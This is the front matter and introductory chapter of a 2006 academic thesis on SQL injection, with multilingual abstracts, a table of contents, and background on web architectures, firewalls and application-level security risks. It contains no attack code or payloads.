Hacking With Sql Injection Exposed - A Research Thesis

IV
Apart from bibliographic citations, the contents herein presented,
including graphical design, were solely
produced by Carlos Miguel Barreira Ferreira, the author.
Except where expressly stated otherwise, you are not permitted to copy, broadcast, download, store (in any
medium), transmit, show or play in public, adapt or change in any way the content of thesis for any other purpose
whatsoever without the prior written permission of the author.
© 2006 Carlos Miguel Barreira Ferreira. All rights reserved. Todos os direitos reservados.

in memory of my father and to Jesus, lover of my soul

• a c k •
acknowledgements • a c k •
Hacking with SQL Injection Exposed VII
My first word of gratitude goes of course to my closest family members. I thank my wife
Ana, my young daughter Sara, and my mother, for their loving care and enduring
patience.
I also thank my supervisor, professor Pedro Isaías for the time and effort he commited
into this endeavor, and for his priceless support whenever I needed someone to stand up
for me. His expertise, open mind and insight were invaluable assets on the development
of this research thesis.
My final word of appreciation goes to those friends and professionals who took the time
to review this document. My gratitude to:
• Andreas Goldschimdt, Project Manager at Hewlett-Packard EMEA
• Ângela Martins, HR Partner at Microsoft
• Pedro Machado, Consultant at UNISYS
• Shaun Leisegang, Technical Specialist at SourceCode EMEA

• a b s t r a c t •
abstract • a b s t r a c t •
Hacking with SQL Injection Exposed IX
owadays, information constitutes an organization’s most valuable asset and attacks on it
could threaten the organization’s integrity, availability and confidentiality. Despite the fact
that organizations have committed plenty of resources into security, code injection attacks, where
a remote attacker attempts to fool a software system into executing some carefully crafted attack
code and thereby gain control of the system, have become commonplace in recent years. SQL
Injection is an emerging code injection technique that specifically targets the underlying relational
database management system of an e-Business platform via its frontend which typically is, but by
no means restricted to, a Web page. It literally bypasses all security barriers, shattering the
corporate investments in IT security. Even though such harm can be inflicted, it seems that only
minimal resources are invested in developing security standards and in-built security measures in
Web applications as the SQL Injection topic is still poorly studied.
Using a combination of action research and literature review, this research proposes the first
unifying definition of SQL Injection and the first taxonomy of attacks. This taxonomy is then used
as basis for experimenting on a real e-Business platform in order to answer to the research
question which inquiries if «the weakness of modern e Business systems can be demonstrated by
proving SQL Injection techniques to be effective in obtaining and altering private business data».
This work demonstrates that SQL Injection is indeed an effective means to illicitly access and
manipulate private business data. It also demonstrates that even though some countermeasures
exist, a comprehensive solution is still far into the future. Finally, this work establishes that if an
effective solution is ever to be found it must unify technology, people, processes, and policies,
while accounting for the business problems and challenges organizations are faced with. For the
time being, principles are the best means of addressing the SQL Injection threat in a holistic
fashion. Though this work is all about exposing and not actuality preventing, a compilation of
useful principles has been included.
N

• r e s u m o •
resumo • r e s u m o •
Hacking with SQL Injection Exposed XI
informação constitui hoje o activo mais valioso nas organizações. Ataques especificamente
direccionados à informação colocarão em risco a integridade, disponibilidade e
confidencialidade das organizações. Apesar de estas terem historicamente empregue recursos
consideráveis na componente de segurança, ataques de injecção de código, onde um atacante
remoto tenta manipular um sistema de informação em vista da execução de código malicioso por
parte deste, têm sido cada vez mais comuns ao longo dos últimos anos. SQL Injection é uma
técnica emergente de injecção de código que tem por alvo o sistema de gestão de bases de
dados das aplicações de suporte ao negócio sendo o ataque perpetrado através da interface com
o utilizador que tipicamente aos dias de hoje será possivelmente uma página Web. Esta técnica
permite literalmente evitar as barreiras de segurança existentes, deitando por terra os
investimentos já feitos em segurança. Apesar de tantos danos poderem ser infligidos, dir-se-ia que
apenas recursos mínimos têm sido empregues no desenvolvimento de standards e medidas de
base às aplicações Web pois o tópico do SQL Injection é ainda muito pouco estudado.
Tendo por base uma combinação de action research e revisão de literatura, este trabalho de
investigação propõe a primeira definição unificadora de SQL Injection e a primeira taxonomia de
ataques. Esta taxonomia é seguidamente utilizada na validação experimental da questão de
investigação que indaga se «através de SQL Injection será possível demonstrar a vulnerabilidade
dos sistemas de e-Business ao obterem-se e alterarem-se dados privados do negócio».
Este trabalho demonstra que de facto o SQL Injection é uma técnica eficaz de obtenção e
alteração ilícita de dados privados de negócio. Demonstra-se igualmente que apesar de existirem
algumas medidas preventivas, uma solução global encontra-se ainda longe, tendo ficado claro
que se alguma vez tal solução de carácter abrangente for formulada, terá de equacionar aspectos
tecnológicos, humanos, processuais e procedimentais. Presentemente, o recurso a princípios
apresenta-se como o melhor meio de combinar todos estes factores. Desta forma, incluiu-se uma
compilação de princípios que permitem mitigar a ameaça do SQL Injection.
A

• a b s t r a i t •
abstrait • a b s t r a i t •
Hacking with SQL Injection Exposed XIII
De nos jours, l’information représente l’actif le plus précieux dans une organisation. Des assauts
dirigés exclusivement à cette information pourront éventuellement mettre en danger l’intégrité, la
disponibilité et la confidentialité de l’organisation. Même si, au long des temps, elle se défendait
utilisant des ressources remarquables en ce qui concerne la sécurité, des assauts d’injection de
code, où un assaillant non local s’aventure à manipuler un système d’information en vue de, lui-
même, exécuter un code malicieux, ont été de plus en plus fréquents au long des dernières
années. SQL Injection est une technique émergente d’injection de code ciblant le système de
gestion de base de données des applications de support de l’affaire et l’assaut est réalisé grâce à
l’interface avec l’utilisateur qui, actuellement, peut être une page Web. Cette technique permet de
doubler les obstacles de sécurité, terrassant les investissements déjà faits en sécurité. Malgré
l’imposition d’autant de dommages, seul quelques vaines ressources ont été employées dans le
développement de standards et de moyens de base aux applications Web puisque le topique SQL
Injection est encore très peu étudié.
Ayant comme soutien une combinaison d’action research et une révision de littérature, ce travail
de recherche se propose à, pour la première fois, définir de façon unificatrice SQL Injection et
aussi à présenter la première taxinomie d’assauts. Celle-ci sert de support à la validation
expérimentale de la question de cette recherche qui enquête si «par SQL Injection il est possible de
démontrer la vulnérabilité des systèmes du e-Business par l’obtention et par la modification de
données privées de l’affaire».
Cette recherche prouve que SQL Injection est effectivement une technique efficace à l’obtention et à
la modification illicites de données privées de l’affaire. Elle affirme également que, même s’il existe
quelques mesures préventives, une solution déterministe est bien lointaine. Elle soutient l’opinion
que, si cette solution englobante se formulerait, elle devra tenir en compte des aspects
technologiques, humains, processifs et de conduite. À l’heure actuelle, le recours à des principes
semble être le meilleur moyen d’associer tous ces éléments. C’est pourquoi, une compilation de
principes qui permettent l’adoucissement de la menace du SQL Injection est incluse dans ce travail.

• c o n t e n t s •
contents • c o n t e n t s •
Hacking with SQL Injection Exposed XV
CONTENTS
Contents.............................................................................................................................................15
List of Figures .......................................................................................................................................................... 20
List of Tables............................................................................................................................................................ 22
Introduction......................................................................................................................................23
Background............................................................................................................................................................. 24
4Webbed Organizations............................................................................................................................. 25
4About Security........................................................................................................................................... 30
4Introducing Web Applications.................................................................................................................. 36
4SQL Injection – The Research Topic.......................................................................................................... 43
4About SQL Injection..................................................................................................................................45
4Simple Conceptual Example.....................................................................................................................46
About This Research ............................................................................................................................................... 49
4The Problem and Challenges.................................................................................................................... 49
4The Research Question ............................................................................................................................. 50
4Purpose and Goals.................................................................................................................................... 50

Hacking with SQL Injection ExposedXVI
4Scope..........................................................................................................................................................51
4Motivation..................................................................................................................................................52
4Document Outline.....................................................................................................................................53
Literature Review.............................................................................................................................55
Research Strategy.....................................................................................................................................................56
Findings....................................................................................................................................................................62
4Definition of SQL Injection.........................................................................................................................63
4RDBMS and SQL ........................................................................................................................................66
4Relational Database Management Systems – RDBMS.............................................................................66
4Data Definition Language – DDL..............................................................................................................72
4Data Manipulating Language – DML.......................................................................................................77
4Data Control Language – DCL..................................................................................................................80
4Security in Databases................................................................................................................................80
4World Wide Web.......................................................................................................................................84
4Systems Architectures...............................................................................................................................85
4Security in Applications on the Wild Wild Web.......................................................................................91
Critical Analysis.........................................................................................................................................................96
4Lessons Learned.........................................................................................................................................96
4Direct Implications .....................................................................................................................................98
4Refutation of Arguments...........................................................................................................................98
4Paramount Topics Surrounding SQL-Injection..........................................................................................99
4Additional Research................................................................................................................................ 100
4Projects In This Area................................................................................................................................ 101
Conclusions........................................................................................................................................................... 102
Methodology ..................................................................................................................................103
Research Strategy.................................................................................................................................................. 104
Findings................................................................................................................................................................. 105
4Research Philosophies............................................................................................................................. 106
4Positivism................................................................................................................................................ 106
4Critical Realism....................................................................................................................................... 108
4Interpretivism......................................................................................................................................... 108

Hacking with SQL Injection Exposed XVII
4Research Approaches..............................................................................................................................110
4Deduction .............................................................................................................................................. 110
4Induction................................................................................................................................................ 111
4Research Strategies .................................................................................................................................111
4Experimentation..................................................................................................................................... 111
4Surveys................................................................................................................................................... 112
4Case-Study ............................................................................................................................................. 113
4Grounded-Theory .................................................................................................................................. 113
4Ethnography.......................................................................................................................................... 114
4Action Research ..................................................................................................................................... 114
4Temporal Horizons..................................................................................................................................116
4Multiple Methods: Triangulation............................................................................................................116
Critical Analysis......................................................................................................................................................118
4Lessons Learned ......................................................................................................................................118
4Refutation of Research Approaches .......................................................................................................119
4Direct Implications...................................................................................................................................120
Research Methods ................................................................................................................................................121
Attack Taxonomy............................................................................................................................123
Survey of Techniques............................................................................................................................................124
4Setting the Objective...............................................................................................................................126
4Choosing the Method.............................................................................................................................127
4Data Manipulation................................................................................................................................. 127
4Authentication Bypass........................................................................................................................... 128
4Information Retrieval ............................................................................................................................. 130
4Information Manipulation..................................................................................................................... 130
4Information Fabrication......................................................................................................................... 131
4Information Deletion ............................................................................................................................. 132
4Extending to Other Data Sources with OleDb....................................................................................... 132
4Extending Beyond the RDBMS by Using Command Execution............................................................ 140
4Uploading Files....................................................................................................................................... 142
4Examining Prerequisites ..........................................................................................................................144
4Subqueries ............................................................................................................................................. 145

Hacking with SQL Injection ExposedXVIII
4JOIN........................................................................................................................................................ 146
4UNION ................................................................................................................................................... 147
4Multiple Statements .............................................................................................................................. 148
4Comments............................................................................................................................................. 148
4Error Messages....................................................................................................................................... 148
4Implicit Type Casting.............................................................................................................................. 149
4Variable Morphism................................................................................................................................ 150
4Stored Procedures.................................................................................................................................. 152
4String Concatenation for Building Dynamic SQL .................................................................................. 152
4INTO....................................................................................................................................................... 153
4Weak Policies and Principles.................................................................................................................. 153
4Poking for Vulnerabilities........................................................................................................................ 154
4Unvalidated Input.................................................................................................................................. 154
4Error Message Feedback........................................................................................................................ 155
4Time Delays............................................................................................................................................ 156
4Uncontrolled Variable Size..................................................................................................................... 158
4Type Casting & Variable Morphism....................................................................................................... 159
4Single Quotation Marks in Building Dynamic Queries.......................................................................... 160
4Discovering Database Objects ............................................................................................................... 161
4Offline Research..................................................................................................................................... 164
4Choosing Means..................................................................................................................................... 165
4Web Form Manipulation....................................................................................................................... 166
4URL Header Manipulation..................................................................................................................... 168
4HTTP Header Manipulation................................................................................................................... 169
4Cookie Poisoning ................................................................................................................................... 173
4Designing the Query............................................................................................................................... 175
Toward The Taxonomy......................................................................................................................................... 176
4Unifying Definition for SQL Injection...................................................................................................... 178
4Taxonomy Formulation........................................................................................................................... 179
Experimenting ................................................................................................................................187
Real Environment Test .......................................................................................................................................... 188
Defensive Tactics ............................................................................................................................195

Hacking with SQL Injection Exposed XIX
Technology-Based.................................................................................................................................................197
Principle-Based......................................................................................................................................................204
Conclusions .....................................................................................................................................213
4Introduction......................................................................................................................................................214
4Discussion of Results.........................................................................................................................................217
4Contributions of This Work ..............................................................................................................................220
4Implications.......................................................................................................................................................221
4Limitations of This Work...................................................................................................................................222
4Further Investigation.........................................................................................................................................223
References .......................................................................................................................................225
Glossary............................................................................................................................................231

Hacking with SQL Injection ExposedXX
LIST OF FIGURES
Figure 1 - The Evolution of Business ...............................................................................................................................26
Figure 2 - The Evolution of Information Technology Architectures ...............................................................................27
Figure 3 - The Evolution of the Internet..........................................................................................................................28
Figure 4 - Breakdown of CVE security vulnerabilities found in 2003 and 2004............................................................31
Figure 5 - The Seven Layers of the OSI Model................................................................................................................32
Figure 6 - Typical Web Infrastructure Layout..................................................................................................................34
Figure 7 - The Spaghetti IT Architecture.........................................................................................................................37
Figure 8 - Classic Three-Tier Web Architecture Model....................................................................................................40
Figure 9 - Use of Textual Representation in an Application ...........................................................................................41
Figure 10 - Summary of the Causing Factors of SQL Injection.....................................................................................43
Figure 11 - The Literature Review Process .....................................................................................................................57
Figure 12 - Literature Sources Available ........................................................................................................................62
Figure 13 - Worldwide RDBMS Market Share in 2002.................................................................................................70
Figure 14 - Worldwide RDBMS Market Share in 2003 Excluding Mainframes............................................................71
Figure 15 - Simple Relational Data Structure ................................................................................................................72
Figure 16 - Overriding Table Permissions on MS SQL Server 2005 ..............................................................................83
Figure 17 - No Application Is An Island.........................................................................................................................84
Figure 18 - Bridging the Gap Between Business and IT................................................................................................87
Figure 19 - The Evolution to Services.............................................................................................................................88
Figure 20 - Gartner Web Services Magic Quadrant......................................................................................................89
Figure 21 - Web Services Enabled Service-Oriented Architecture................................................................................90
Figure 22 - The Four Points of Authentication of a Database-Enabled Remote Web Request....................................91
Figure 23 - Authentication Methods in IIS 6.0..............................................................................................................91
Figure 24 - User vs. Account Impersonation on a Web Application............................................................................92
Figure 25 - The Research Process “Onion”................................................................................................................. 105
Figure 26 - Microsoft’s Endorsement of Windows Authentication........................................................................... 137
Figure 27 - Corporate Messaging Software, IB Market Share, 2005 ........................................................................ 138
Figure 28 - Primary Key Information Exchanged via URL Querystring....................................................................... 151
Figure 29 - Sniffing SQL Statements Processed by the RDBMS in Real-Time............................................................ 165

Hacking with SQL Injection Exposed XXI
Figure 30 - Typical Activity Log of a Web Server........................................................................................................175
Figure 31 - Taxonomy of SQL Injection Attacks .........................................................................................................179
Figure 32 - Public Page Used for Proof of Concept....................................................................................................188
Figure 33 - Probing for Possible Injection Entrypoints Via a Web Page.....................................................................189
Figure 34 - Error Message Raised by a Successful SQL Injection Attack....................................................................189
Figure 35 - List of Local Files Obtained via an Error Raised by a Successful SQL Injection Attack.............................192
Figure 36 - SQL Injection Attack Prevented by the Microsoft ASP .NET Framework.................................................202
Figure 37 - Exploitation Prevented by the “Secure by Default” Principle on MS SQL Server 2005...........................202
Figure 38 - The Concept of a Trust Boundary and Chokepoints................................................................................209
Figure 39 - The Knowledge Creation Cycle ................................................................................................................214
Figure 40 - The Height of People, Processes, Policies and Technology in SQL Injection...........................................217

Hacking with SQL Injection ExposedXXII
LIST OF TABLES
Table 1 - System Stored Procedures in MS SQL Server 2005........................................................................................76
Table 2 - Handy Extended Stored Procedures in MS SQL Server 2000...................................................................... 142
Table 3 - Explicit and Implicit Type Conversions in MS SQL Server 2005 .................................................................. 149
Table 4 - Common HTTP Server Variables.................................................................................................................. 172
Table 5 - Taxonomy of SQL Injection Attacks............................................................................................................. 185

Hacking with SQL Injection Exposed
Chapter 1
INTRODUCTION
Every Web Application using a relational database can
theoretically be a subject for SQL Injection attacks. This
research aims to develop the first consolidated taxonomy
of attacks by gathering data from a variety of sources that
encompass academic, professional and underground
fonts, thus providing the means for follow-up studies in
preventing these types of attacks.
This chapter's goal is to present what this research is about and introduce the
research topic to the reader by providing an overview of the facts that lead to the
formulation of the research question and what has already been done in that
field. Later on the chapter, an outline of this work will be presented, as well as
the vision of the author about its relevance, and motivation for carrying it out.

introduction •
BACKGROUND
Hacking with SQL Injection Exposed24
BACKGROUND
According to Livshits & Lam (2005), the security of Web applications has become more
and more important over the last decade as Web-based enterprise applications have
increasingly come to manage sensitive information such as financial or medical data.
Within the Information Society context, if such data gets compromised, losses to
organizations could ascend to millions, not counting intangible losses, e.g. loss of
reputation, which typically take the biggest toll and tend to take longer to dissipate. As a
result, Web applications are becoming more secure due to the growing awareness of
attacks. However, in large and complex applications, a single oversight can result in the
compromise of the entire system (Cerrudo 2002). Despite the fact that organizations
have committed plenty of resources into security, code injection attacks, where a remote
attacker attempts to fool a software system into executing some carefully crafted attack
code and thereby gain control of the system, have become commonplace in recent years
(Linn et al. 2004). SQL Injection is an emerging code injection attack specifically targeting
the relational database management system that is empowering an e-Business platform
via its frontend which typically is, but by no means restricted to, a Web page. It literally
bypasses all security barriers, shattering the corporate investments in IT security. Even
though such harm can be inflicted, it seems that only minimal resources are invested in
developing security standards and in-built security measures in Web applications
(Landsmann & Strömberg 2003;Viega & Messi 2004) as the topic is, up till now, poorly
studied.
But the status quo can be looked upon as the result of a combined set of causes of
different natures, such as organizational, technological and methodological factors.
Therefore, it is essential to characterize these three factors in order to portray the reality
surrounding the research topic. These will be respectively addressed over the next topics.

introduction •
BACKGROUND
Hacking with SQL Injection Exposed 25
4 Webbed Organizations
Throughout the years organizations have striven to reduce costs and leverage the use of
the existing technology assets at their disposal while seeking to improve customer service,
increase competitivity, and be more responsive to the strategic priorities of the business
(Endrei et al. 2004) . If true that these challenges arose long before Information
Technology (IT), essentially as a direct consequence of an open market, they were
deepened by the advent of Information Technology and the Knowledge Society. As a
result, IT executives are constantly struggling to enhance the ability and scope of
corporate communication, allowing more efficient information exchange within their
own organizations as well as between partners in their value chains (Landsmann &
Strömberg 2003).
Two underlying principles exist behind these pressures: Heterogeneity and Change.
Heterogeneity because at any point in time mature organizations are the sum of legacy
systems, applications, architectures, processes (and people) of different vendors and eras.
As to Change, Globalization and the e-Business paradigm have tremendously accelerated
its pace over the past decade or so. According to Mark Endrei et al. (2004), Globalization
leads to fierce competition, which in turn leads to shorter product development lifecycles.
Empowered by rich and easily accessible product information, customers tend to change
requirements rapidly hence feeding an ever-accelerating loop of competitive
improvements in products and services. Whilst some organizations have succumbed to
the pressure imposed by the open competition market, the winning formula appears to
be a combination of agility and flexibility.
As a result, organizations have been evolving themselves, and almost of a sudden,
restructuring became a buzz-word associated to dynamic, forth-going organizations.
From highly hierarchical organizations preceding the 80’s, where business divisions were

introduction •
BACKGROUND
vertical, isolated and segmented into departments, organizations evolved to a more
horizontal business-process-centric layout during the 90’s, toward the new business
ecosystem paradigm where the borders across departments became blurred. This
paradigm shift is depicted on the following diagram:
Figure 1 - The Evolution of Business
> adapted from (Endrei et al. 2004) <
But if this is what has been happening to organizations, where does that leave the
corporate IT environment? Business processes no longer pay respect to the sacred, yet
invisible, line separating business units as they all must now cooperate on a mesh of
interactions and players. The mesh itself keeps getting redefined according to the
requirements of the business, yet, the classic business challenges such as cost-reduction
seem to make a stand that agility and flexibility come at high price. Race (2003) indicates
on her report that the base IT challenges organizations are faced with remain essentially
the same. She points out the following challenges as the most relevant:
• Business processes are, by definition, hard to amend;
80’s and before 90’s The New World

introduction •
BACKGROUND
• Integrating different systems is not scalable;
• Non-reutilization of common functional modules, represents financial losses
and reduces interoperability;
• Although there are emerging technologies to address these issues, these are
still immature and troubled by the lack of standards.
Moreover, the evolution of the Internet has laid a foundation for the development and
usage of new categories of Information Technology systems operating on the Web
(Landsmann & Strömberg 2003). While the Web presents itself as a major business driver
promoting research and development of new technologies and standards, and
consequently taking systems architectures one step further, the danger of leaving old
problems behind stands tall.
Figure 2 - The Evolution of Information Technology Architectures
By the time client-server architectures began to be widely used, unstructured data
management, such as the file system, was already mature and looked upon as a
commodity. But the whole purpose of client-server was to serve and consume structured
data. This lead to the appearance and improvement of new and more sophisticated
relational database management systems (RDBMS)1
especially designed for operating
1
According to its role, whether operational or analytical, they can respectively be referenced as OLTP or OLAP.
Although the research topic is transversal to the database role, the focus will reside upon OLTP databases.
SSttrruuccttuurreedd
MMoonnoolliitthhss
CClliieenntt//SSeerrvveerr
33--TTiieerr
NN--TTiieerr
DDiissttrriibbuutteedd
OObbjjeeccttss
CCoommppoonneennttss
SSeerrvviicceess

introduction •
BACKGROUND
within a networked environment2
. But data structuring is just part of the justification for
the prominent role of the RDBMS. According to eXtropia (2006), these systems allow to
store, retrieve and modify data with efficiency regardless the amount of data being
manipulated. But more important, databases have quickly become integral to the design,
development, and services offered by the organizations, and the foundation stone on
which their operational, tactical and strategic business model is based upon. Since the
time of client-server down to Service-Oriented Architectures (see figure 2 on the previous
page), databases have matured and grown in scope within the organizations.
And then the Web came. Informational websites, e-Commerce websites, extranets,
intranets, data exchange, search engines, e-Business, and more, spread like wild fire.
Figure 3 - The Evolution of the Internet
> adapted from (Chakrabarti 2003) <
The World Wide Web, or Web for short, provides connectivity, online access to
information and services, anytime, anywhere around the globe. Corporations quickly
realized the potential of this new revenue stream, and steadily began to adhere to Web
applications by connecting their systems to the Web. Halfond & Orso (2005b) describe
2
There are others that fit this category, such as object-oriented databases, but they are out-of-scope for this work.

introduction •
BACKGROUND
this reality by stating that database-driven Web applications have become widely
deployed on the Internet, and organizations use them to provide a broad range of
services to their customers. As a result, and according to Uzi Ben-Artzi Landsmann &
Donald Strömberg (2003), the business environment has progressively gotten
decentralized. Unlike earlier revolutions, where most of the action occurred within the
corporate protected network environment, and mostly because of the e-Business
paradigm, core business databases have increasingly been exposed to unrestrained
networks such as the Internet by means of various frontends and intricate
multilayer-architectures. This lead to an improvement on the architectures, causing
Service-Oriented Architectures (SOA) to emerge. SOA promotes a business view in
opposition to a technology-centric understanding of the corporate IT environment, by
endorsing abstraction and standardization. Even though business people are getting
more and more control, however, according to Race (2003) the top-level IT challenges
organizations are faced with, still, remain basically the same. In other words, technology
does not solve business problems!
In summary, organizations had to keep the pace with the demands imposed by a
fast-moving market, causing departmental boundaries to blur, and thus providing
the stage for the implementation of transversal business processes. IT became more
business-centric by means of abstraction and standardization as per the
Service-Oriented Architectures approach. The advent of the Web carried the sight of
new unexplored markets, and the promise of success within reach of those who
would move in first. Databases were the keystone providing the reliability the
business had always required and the necessary scalability for expansion into the
Web. But the pressure imposed by a ferocious competition and the rush to conquer
a new vast market unfortunately kept old problems unsolved. Organizations have
grown in complexity and are no longer standing alone, but webbed on the Web.

introduction •
BACKGROUND
4 About Security
The second factor causative of the research topic is of technical nature, as it would be
impossible to address Hacking without referring to security and some technicalities
underneath it.
According to Dieter Gollmann (2006), computer security is the prevention and detection
of unauthorized actions performed by users of a computer system, encompassing three
key goals: integrity, confidentially and availability, which can be ensured by three leading
mechanisms: authentication, encryption and access control3
(Blake 2003;Gollmann
2006). Integrity deals with the prevention of unauthorized modification of information.
Confidentially deals with the prevention of unauthorized disclosure of information, and
availability with the prevention of unauthorized withholding of information or resources.
The primary assets used by an application can be divided into two groups: information
and equipment. Information refers to the data that is stored within the application and
provided to the end-user. Equipment refers to the hardware and software used to deliver
the application (Blake 2003). Although the above mentioned security key goals and
mechanisms are applicable to both information and equipment, things get more serious
when the most treasured asset within an Information Society is threatened: Information
itself. The historical commonness of buffer overflow attacks as an intrusion mechanism
(Boyd & Keromytis 2004;Landsmann & Strömberg 2003;Viega & Messi 2004) has
resulted in substantial research focused on the problem of detecting, preventing and
containing such attacks (Boyd & Keromytis 2004;Landsmann & Strömberg 2003).
Furthermore, according to Uzi Ben-Artzi Landsmann & Donald Strömberg (2003) and the
OWASP project (2006), corporations and security professionals have traditionally
3
These and additional security services and mechanisms will be properly addressed on the Literature Review
chapter.

introduction •
BACKGROUND
committed most of their resources into networking and operating system security.
Therefore, attack methods aiming at these components have been known for some time
and standardized countermeasures have been put in place. On the other hand,
considerably less attention has been paid to attacks at the application level, such as
injection attacks like SQL Injection. According to literature (Álvarez & Petrovic 2003;Boyd
& Keromytis 2004;Gaurav, Angelos, & Vassilis 2003;Huang et al. 2003;Kost
2003;Landsmann & Strömberg 2003;Linn et al. 2004;McDonald 2002;OWASP 2006;Xu,
Bhatkar, & Sekar 2005), Web masters and systems administrators around the globe have
been witnessing a rapid increase in the number of attacks on Web applications.
According to research (Xu, Bhatkar, & Sekar 2005), the breakdown of the common
vulnerabilities and exposures (CVE) in 2003 and 2004 is shown on the next chart:
Figure 4 - Breakdown of CVE security vulnerabilities found in 2003 and 2004
> adapted from (Xu, Bhatkar, & Sekar 2005) <
Design Errors
30%
Directory Transversal
4%
Format String
3%
URL encoding and related 1%
Command Injection 5%
Configuration 3%
Cross-site Scripting 5%
SQL Injection 2%
Other 5%
Memory Errors 22%
DOS
20%

introduction •
BACKGROUND
HTTP FTP Telnet
Ethernet ATM
MAC Address
IP ICMP SNMP
TCP UDP SPX
HTTPS
RPC NETBios
A quick review of the previous chart in will yield that only 23% of the security
vulnerabilities are related to networking and operating system as configuration and
Denial of Service (DoS) are the only set of vulnerabilities fitting into this category. The
remaining part is related to application vulnerabilities in any manner. Concentrating on
this set of threats, the chart corroborates that buffer overflows, same as memory errors, is
the most common intrusion mechanism. Unfortunately, as the chart represents a
snapshot of the reality within a limited interval of time, it is not possible to corroborate
the growth of code injection attacks. One can only infer that the small percentage of
code-injection attacks, and more precisely SQL Injection attacks, is due to its relative new
appearance in the hacking scene. So if there is a clear distinction between attacks aiming
the infrastructure and those aiming the application, let’s drill-down a bit and introduce
the OSI model depicted on the following diagram:
Figure 5 - The Seven Layers of the OSI Model

introduction •
BACKGROUND
The complexity and scope of the OSI model spans way beyond the domain of this work
and therefore only its relevant bits and pieces will be herein described. The OSI model
was developed by the ISO subcommittee and it does not target any specific technology
since it is a framework. What is important to retain from the diagram is the existence of a
layered model which defines a flow of interactions depending on the communication’s
direction. Although the OSI model is not tied up to any particular technology, most of
the protocols shown on the diagram reflect the reality of today’s Web systems, which
depend on HTTP, which in turn uses IP. According to Dawson et al. (2006), TCP is the de
facto standard transport protocol in today’s operating systems and is a very robust
protocol that adapts to various network characteristics, packet loss, link congestion, and
even significant differences in vendor implementations. As security awareness grew over
the years, new TCP-IP based devices and protocols were developed in order to ensure the
previously mentioned prime goals of security. Network appliances now span from simple
network bridges to application-level firewalls and intrusion detection systems (IDS). The
evolution of such devices was not surprisingly in line with the OSI model as attacks
seemed to follow that pattern. The more sophisticated the attack was, the higher its
target was on the hierarchy of layers. So firewalls, the pinnacle set of devices that protect
the resources of one network from users from other networks, evolved to
application-level firewalls in the hopes of stopping attacks happening at this level. But the
intelligence of such devices is limited. They can detect, for example, if HTTP is being used
on a predefined port as opposed to an unexpected telnet session that could potentially
mean that a successful attack was in place. But if the application protocol is inline to
what is expected, although a logical attack like SQL Injection could be in place, these
devices are rendered as inadequate in such situations (Halfond & Orso 2005a). Due to
this limitation, Intrusion Detection Systems were developed. They try to discover
behavioural patterns in order to determine if an attack is indeed in place, but IDSs are

introduction •
BACKGROUND
only as smart as their knowledge database and are known to be prone to false positives.
Back to the chart in Figure 4 - Breakdown of CVE security vulnerabilities found in 2003
and 2004 on page 31, what makes applications so appetizing is the fact that ordinary
networking safeguards can be bypassed by carrying out a logical attack on the
application. These attacks try to fool the application into executing some carefully crafted
code on the hacker’s behalf using the application’s security context. The following
diagram depicts a common corporate architecture that offers a set of Web-based
applications that depend on corporate key systems.
Figure 6 - Typical Web Infrastructure Layout
Basically, most Web servers are separated from clients by firewalls (Landsmann &
Strömberg 2003); in this case two firewalls are used for providing two protected zones of
security. Remote users on the public zone, the Internet, perform legitimate requests to a
system sitting in the corporate demilitarized zone (DMZ). These requests can vary in
nature, but for the sake of simplicity let’s assume it is a standard Web request triggered
by a user using any standard Internet browser. The default rule of a firewall is to deny all
PPuubblliicc
ZZoonnee
DDeemmiilliittaarriizzeedd
ZZoonnee
PPrriivvaattee
ZZoonnee hhttttpp::8800
ssqqll::11443333

introduction •
BACKGROUND
requests, thus forcing a declarative security model. In order to allow public requests to be
addressed by the proper system, the public firewall is configured to allow incoming
requests using the HTTP protocol (layer 7 of the OSI model) on its expected default port
number 80. Subsequently, it is common that such systems on the DMZ require access to
some corporate business systems, sitting within the corporate private environment.
Probably the most typical scenario would be access to a relational database management
system. Using the same logic as before, the second firewall permits such requests coming
from a server on the DMZ depending on the expected incoming and outgoing protocol
types, requesting entity and destination system. So trying to use blocked ports to access
other kind of services is very difficult from a hacker’s perspective sitting on the public
zone, especially when firewalls have the ability to read protocols on layer 7. On the other
hand, if the remote user fools the application on the DMZ to perform illicit tasks on his
behalf, from a network security point of view no attack will be in progress, but the
privileged security context of the application itself allows piggy-backing malicious code on
a legitimate request.
In summary, Web attacks, i.e. attacks exclusively using the HTTP/HTTPS protocol, are
rapidly becoming one of the fundamental threats for information systems
connected to the Internet (Álvarez & Petrovic 2003). Such attacks target databases
that are accessible through a Web frontend, and take advantage of flaws in the
input validation logic of Web components (Boyd & Keromytis 2004). This is so
because although most Web servers are separated from clients by firewalls and
other security devices, however from a security perspective, Web applications offer
users legitimate channels through firewalls into corporate systems. When launched
from within the application logic, attacks are in general harder to detect and
protect against (Landsmann & Strömberg 2003;OWASP 2006;Spett 2002).

introduction •
BACKGROUND
4 Introducing Web Applications
Now that both organizational and technical factors surrounding the research topic have
been outlined, the remaining set of factors is of methodological nature. The OWASP
project (2006) states that any software application built on client-server technology that
operates on the Web and interacts with users or other systems using HTTP, could be
classified as a Web application. These applications aim to provide connectivity and access
to online services and information to users. Spett (2002) indicates that they range from
simple to very complex, and each has a distinct purpose. OWASP (2006) goes further into
detail by stating that nowadays high-end Web applications encompass realtime sales and
inventory across multi-vendors, including Business-To-Business and
Business-To-Consumer, flow of work and supply chain management, and legacy
applications.
In Information Technology, legacy applications and data are those that have been
inherited from languages, platforms, and techniques earlier than the current technology.
In the past, most programming targeted specific operating systems. A quick search on
the Wikipedia (2006e) will yield that in the IT industry, legacy is defined as «an antiquated
computer system or application program which continues to be used because the user
(typically an organization) does not want to replace or redesign it». These systems
typically are monoliths (see Figure 2 - The Evolution of Information Technology
Architectures on page 27) and complex, resulting in prohibitive redesign costs.
Furthermore, they tend to be highly-available systems with nearly 100% uptime, with
little or no existing documentation on how the system operates, resulting in the inability
to expand and update it. On the other hand, since the .COM bubble burst another point
of view has arisen. The Wikipedia (2006e) defines it as «legacy systems are simply (and
only) computer systems that are both installed and working». So it all comes does down

introduction •
BACKGROUND
to the risk and cost of change, compared to the possible benefit resulting from the
replacement of such systems. Although the following picture pretends to be a satyr of
some intricate IT architecture drawn on a flipchart during an IT staff meeting, it could
very well represent a real scenario of an organization that has grown overtime, but kept
its legacy systems operating.
Figure 7 - The Spaghetti IT Architecture
Managing such architecture would definitely be a nightmare, no matter how good, or
how many professionals are in-charged of that burden. What is sought by presenting this
scenario is that avoiding a long-term IT architecture to become an uncontrolled monster
requires a whole lot of effort and discipline. But medium to large organizations simply
cannot get rid of core business systems at the same rate they become legacy. As
architectures evolve (see Figure 2 - The Evolution of Information Technology Architectures

introduction •
